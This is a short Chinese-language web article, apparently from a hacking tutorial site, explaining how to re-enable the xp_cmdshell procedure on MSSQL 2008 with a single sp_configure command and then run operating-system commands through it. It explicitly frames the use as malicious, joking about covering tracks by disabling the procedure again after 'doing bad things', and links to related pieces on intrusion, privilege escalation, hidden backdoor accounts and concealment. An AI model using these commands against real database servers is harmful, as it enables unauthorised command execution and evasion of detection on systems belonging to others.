MSSQL2008一句话启用xp_cmdshell
MSSQL2008一句话启用xp_cmdshell基于安全考虑,MSSQL2005及以上版本默认禁用了xp_cmdshell。直接调用该扩展存储过程会提示... 11-09-29
sql server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 sql server 联机丛书中的 "外围应用配置器"。


幸运的是:只要该扩展存储过程没被删除,我们就可以一句话启用它(不支持多句执行的话,请单独执行每句):
exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'xp_cmdshell', 1;reconfigure;

好了,来试试!
exec master..xp_cmdshell "whoami"

ps:干完坏事要擦pp哦!将开启语句的第二个1改成0再执行,xp_cmdshell就又处于禁用状态了
相关文章:
-
linux系统从入侵到提权的详细过程(图文)本文详细介绍了linux下的入侵过程... 12-06-13 …
-
-
一个百度应用差评引起的渗透 渗透百度应用全过程本文教你如何修改百度应用差评... 12-06-15 …
-
服务器建立超级隐藏账号方法
服务器建立超级隐藏账号方法当黑客入侵一台主机后,会想方设法保护自己的“劳动成果”,因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最多的就是账户隐藏技术...
[阅读全文]
-
Linux下的匿迹隐藏方法
Linux下的匿迹隐藏方法如何使自己在系统中隐藏的更深,是我们必 须掌握的基本功。当然,如果管理员真的想搞你而他的功力又足够足的话,相信没什么人能够真正的踏雪...
[阅读全文]
-
版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。
发表评论